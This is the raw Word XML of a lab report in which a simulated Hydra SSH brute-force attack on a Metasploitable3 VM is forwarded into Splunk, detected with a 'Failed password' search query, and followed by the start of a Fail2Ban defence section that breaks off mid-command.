    <w:p w14:paraId="7EF0D349" w14:textId="77777777" w:rsidR="004D7769" w:rsidRDefault="004D7769">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="447F1131" w14:textId="77777777" w:rsidR="0073390A" w:rsidRDefault="0073390A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="390C747D" w14:textId="77777777" w:rsidR="0073390A" w:rsidRDefault="0073390A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E91587E" w14:textId="77777777" w:rsidR="0073390A" w:rsidRDefault="0073390A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E81025E" w14:textId="77777777" w:rsidR="0073390A" w:rsidRDefault="0073390A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31F26F54" w14:textId="77777777" w:rsidR="0073390A" w:rsidRDefault="0073390A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39DD7E6D" w14:textId="77777777" w:rsidR="0073390A" w:rsidRDefault="0073390A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="412F54E5" w14:textId="77777777" w:rsidR="0073390A" w:rsidRDefault="0073390A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="448C3C64" w14:textId="77777777" w:rsidR="0073390A" w:rsidRDefault="0073390A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3366C849" w14:textId="77777777" w:rsidR="0073390A" w:rsidRDefault="0073390A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70C55D34" w14:textId="77777777" w:rsidR="0073390A" w:rsidRDefault="0073390A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="145DBE70" w14:textId="29B4E8C3" w:rsidR="005D6CB0" w:rsidRPr="00CC4DE0" w:rsidRDefault="005D6CB0" w:rsidP="005D6CB0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC4DE0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Phase 2 Report – SIEM Log Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5F7858" w14:textId="77777777" w:rsidR="005D6CB0" w:rsidRPr="00BB263C" w:rsidRDefault="005D6CB0" w:rsidP="005D6CB0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB263C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t>Log Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4898C7DF" w14:textId="77777777" w:rsidR="005D6CB0" w:rsidRPr="00BB263C" w:rsidRDefault="005D6CB0" w:rsidP="005D6CB0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB263C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Splunk Universal Forwarder was successfully installed on the victim machine (Metasploitable3). Logs from /var/log/auth.log were integrated into Splunk running on the attacker machine (Kali) using port 9997. Forwarding status was confirmed active via the Splunk CLI, and data ingestion was verified in Splunk Web under Data Summary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28389240" w14:textId="77777777" w:rsidR="005D6CB0" w:rsidRPr="00BB263C" w:rsidRDefault="005D6CB0" w:rsidP="005D6CB0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB263C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664896" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="26DBF40E" wp14:editId="5F2E8863">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-52210</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3254820</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="204120" cy="256320"/>
                <wp:effectExtent l="57150" t="57150" r="5715" b="48895"/>
                <wp:wrapNone/>
                <wp:docPr id="992652850"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204120" cy="256320"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shapetype w14:anchorId="5739F8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8pt;margin-top:255.6pt;width:17.45pt;height:21.6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">
                <v:imagedata r:id="rId18" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00BB263C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpi">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663872" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="17332CDD" wp14:editId="214CC72B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1263230</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3273900</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="154080" cy="235800"/>
                <wp:effectExtent l="57150" t="57150" r="0" b="50165"/>
                <wp:wrapNone/>
                <wp:docPr id="699936865"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154080" cy="235800"/>
                      </w14:xfrm>
                    </w14:contentPart>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="61FD19F4" id="Ink 5" o:spid="_x0000_s1026" type="#_x0000_t75" style="position:absolute;margin-left:98.75pt;margin-top:257.1pt;width:13.55pt;height:19.9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">
                <v:imagedata r:id="rId20" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00BB263C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19818EE5" wp14:editId="1A53AB9B">
            <wp:extent cx="5486400" cy="1683385"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="930573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3080" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="1683385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00BB263C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16EB0691" wp14:editId="5167B76D">
            <wp:extent cx="5480050" cy="698500"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="1761565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32908" name="Picture 1" descr="A screen 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8519"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5480050" cy="698500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00BB263C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12F4A6C5" wp14:editId="619A1619">
            <wp:extent cx="5486400" cy="463550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="180487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7978"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="463550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00BB263C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17D8CA2C" wp14:editId="72D0B5D9">
            <wp:extent cx="5480050" cy="901700"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1451112584"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7895" name="Picture 3" descr="A screen shot of a computer&#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b="-709"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5480050" cy="901700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00BB263C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BDD4B0E" wp14:editId="0395306E">
            <wp:extent cx="5486400" cy="2222500"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="12049350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8296" name="Picture 8"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222500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4F6BBB" w14:textId="77777777" w:rsidR="005D6CB0" w:rsidRPr="00BB263C" w:rsidRDefault="005D6CB0" w:rsidP="005D6CB0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AE4AD8B" w14:textId="77777777" w:rsidR="005D6CB0" w:rsidRPr="00BB263C" w:rsidRDefault="005D6CB0" w:rsidP="005D6CB0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB263C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Attack Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E2615A" w14:textId="77777777" w:rsidR="005D6CB0" w:rsidRPr="00BB263C" w:rsidRDefault="005D6CB0" w:rsidP="005D6CB0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB263C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">A brute force SSH attack was executed using Hydra from the attacker machine (IP: 10.0.2.4) targeting the victim machine (IP: 10.0.2.15). Hydra used the root username and a common password list to attempt login </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB263C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB263C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> the SSH service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BD617B" w14:textId="77777777" w:rsidR="005D6CB0" w:rsidRPr="00BB263C" w:rsidRDefault="005D6CB0" w:rsidP="005D6CB0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB263C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D6FA55C" wp14:editId="0F277325">
            <wp:extent cx="5480050" cy="1214755"/>
            <wp:effectExtent l="0" t="0" r="6350" b="4445"/>
            <wp:docPr id="107959983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656" name="Picture 2"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1214755"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="505196D5" w14:textId="77777777" w:rsidR="005D6CB0" w:rsidRPr="00BB263C" w:rsidRDefault="005D6CB0" w:rsidP="005D6CB0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB263C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t>Log Analysis and Visualization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6514507A" w14:textId="77777777" w:rsidR="005D6CB0" w:rsidRPr="00BB263C" w:rsidRDefault="005D6CB0" w:rsidP="005D6CB0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB263C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Failed login attempts were captured in Splunk using the following search query:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB263C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    index=* source="/var/log/auth.log" "Failed password"</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB263C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7779192C" wp14:editId="331256D6">
            <wp:extent cx="5473700" cy="1911350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="167701344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5629" name="Picture 10"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3700" cy="1911350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00BB263C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:br/>
        <w:t>These events clearly showed repeated login failures from 10.0.2.4, confirming the brute force activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57605620" w14:textId="77777777" w:rsidR="005D6CB0" w:rsidRPr="00BB263C" w:rsidRDefault="005D6CB0" w:rsidP="005D6CB0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB263C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Additional visualizations were created to analyze the attack:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB263C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve"> - Time-based column chart of failed SSH attempts</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB263C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve"> - Frequency count by attacker IP using rex and stats</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB263C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:br/>
        <w:t>These visualizations highlighted the volume and concentration of failed login attempts during the attack window.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB263C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB263C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="333DFF5D" wp14:editId="6C7A553F">
            <wp:extent cx="5480050" cy="1473200"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="35945755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9528" name="Picture 11"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0050" cy="1473200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D4E27E" w14:textId="77777777" w:rsidR="005D6CB0" w:rsidRPr="00BB263C" w:rsidRDefault="005D6CB0" w:rsidP="005D6CB0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7301BF95" w14:textId="77777777" w:rsidR="005D6CB0" w:rsidRPr="00BB263C" w:rsidRDefault="005D6CB0" w:rsidP="005D6CB0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB263C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>The logs from the victim system were successfully integrated into the SIEM (Splunk), and the brute force SSH attack was effectively visualized and analyzed. This confirms the readiness of the monitoring setup to detect real-world attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251F9FBB" w14:textId="77777777" w:rsidR="005D6CB0" w:rsidRPr="00B41B50" w:rsidRDefault="005D6CB0" w:rsidP="005D6CB0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E81B5FB" w14:textId="4930E6D1" w:rsidR="005D6CB0" w:rsidRPr="00CC4DE0" w:rsidRDefault="005D6CB0" w:rsidP="005D6CB0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC4DE0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC4DE0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Report – </w:t>
      </w:r>
      <w:r w:rsidRPr="005D6CB0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Defensive Strategy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F218F75" w14:textId="77777777" w:rsidR="005D6CB0" w:rsidRPr="00B41B50" w:rsidRDefault="005D6CB0" w:rsidP="005D6CB0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63043536" w14:textId="07D418E8" w:rsidR="004D7769" w:rsidRDefault="005D6CB0" w:rsidP="005D6CB0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D6CB0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>We updated the system and installed Fail2Ban to defend the SSH service from brute-force attacks.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="005D6CB0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Fail2Ban monitors authentication logs and automatically bans IPs that fail multiple login attempts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1F8A68" w14:textId="77777777" w:rsidR="005D6CB0" w:rsidRDefault="005D6CB0" w:rsidP="005D6CB0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AA27081" w14:textId="77777777" w:rsidR="005D6CB0" w:rsidRPr="005D6CB0" w:rsidRDefault="005D6CB0" w:rsidP="005D6CB0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D6CB0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D6CB0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
